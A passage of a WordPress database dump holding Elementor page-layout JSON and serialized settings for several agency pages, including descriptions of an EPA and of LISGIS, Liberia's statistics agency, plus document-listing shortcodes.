":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1d082a4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3fed2f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:fda\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9585,1670,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9586,1670,'_elementor_edit_mode','builder'),(9587,1670,'_elementor_template_type','wp-post'),(9588,1670,'_elementor_version','2.7.5'),(9589,1670,'_wp_page_template','default'),(9590,1670,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20a8d07\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e84457\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"57f59e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b007c95\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9591,1671,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(9592,1671,'_elementor_edit_mode','builder'),(9593,1671,'_elementor_template_type','wp-post'),(9594,1671,'_elementor_version','2.7.5'),(9595,1671,'_wp_page_template','default'),(9596,1671,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:epa\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9597,1672,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9598,1672,'_elementor_edit_mode','builder'),(9599,1672,'_elementor_template_type','wp-post'),(9600,1672,'_elementor_version','2.7.5'),(9601,1672,'_wp_page_template','default'),(9602,1672,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b9ecfb\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dfcc11d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b27ce91\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"88a92e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb88ab3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\"